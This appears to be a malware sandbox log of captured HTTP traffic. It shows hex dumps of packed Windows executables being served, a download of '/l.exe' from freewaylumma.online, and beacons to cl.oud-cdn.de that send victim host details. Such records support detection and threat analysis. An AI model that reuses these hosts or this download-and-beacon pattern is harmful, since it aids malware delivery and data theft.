Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:07 GMTContent-Type: application/octet-streamContent-Length: 1888768Last-Modified: Mon, 11 Nov 2024 22:04:59 GMTConnection: keep-aliveETag: "67327f8b-1cd200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 3b a0 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 be 03 00 00 c2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 48 a9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 3e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 20 05 00 00 00 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 40 05 00 00 02 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 74 6c 6d 70 6c 63 6e 00 60 1a 00 00 50 30 00 00 5a 1a 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 64 78 69 61 67 73 69 00 10 00 00 00 b0 4a 00 00 04 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 b0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:07 GMTContent-Type: application/octet-streamContent-Length: 1888768Last-Modified: Mon, 11 Nov 2024 22:04:59 GMTConnection: keep-aliveETag: "67327f8b-1cd200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 3b a0 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 be 03 00 00 c2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 48 a9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 3e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 20 05 00 00 00 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 40 05 00 00 02 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 74 6c 6d 70 6c 63 6e 00 60 1a 00 00 50 30 00 00 5a 1a 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 64 78 69 61 67 73 69 00 10 00 00 00 b0 4a 00 00 04 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 b0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:19 GMTContent-Type: application/octet-streamContent-Length: 3161088Last-Modified: Mon, 11 Nov 2024 22:52:43 GMTConnection: keep-aliveETag: "67328abb-303c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 40 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 30 00 00 04 00 00 1a 1d 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 77 61 68 6a 6e 69 67 00 80 2a 00 00 b0 05 00 00 80 2a 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 70 66 67 70 66 6b 7a 00 10 00 00 00 30 30 00 00 04 00 00 00 16 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 30 00 00 22 00 00 00 1a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:23 GMTContent-Type: application/octet-streamContent-Length: 1815040Last-Modified: Mon, 11 Nov 2024 22:52:56 GMTConnection: keep-aliveETag: "67328ac8-1bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 78 64 62 7a 63 6a 6a 00 20 1a 00 00 80 4f 00 00 16 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 78 73 6e 6c 68 70 7a 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:31 GMTContent-Type: application/octet-streamContent-Length: 2786816Last-Modified: Mon, 11 Nov 2024 22:51:27 GMTConnection: keep-aliveETag: "67328a6f-2a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 cc cc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 66 69 63 67 79 6e 77 00 40 2a 00 00 a0 00 00 00 26 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 79 68 69 66 6e 63 6f 00 20 00 00 00 e0 2a 00 00 04 00 00 00 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 64 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:38 GMTContent-Type: application/octet-streamContent-Length: 1815040Last-Modified: Mon, 11 Nov 2024 22:52:56 GMTConnection: keep-aliveETag: "67328ac8-1bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 78 64 62 7a 63 6a 6a 00 20 1a 00 00 80 4f 00 00 16 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 78 73 6e 6c 68 70 7a 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:53 GMTContent-Type: application/octet-streamContent-Length: 1815040Last-Modified: Mon, 11 Nov 2024 22:52:56 GMTConnection: keep-aliveETag: "67328ac8-1bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 78 64 62 7a 63 6a 6a 00 20 1a 00 00 80 4f 00 00 16 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 78 73 6e 6c 68 70 7a 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /l.exe HTTP/1.1Host: freewaylumma.online
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: freewaylumma.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
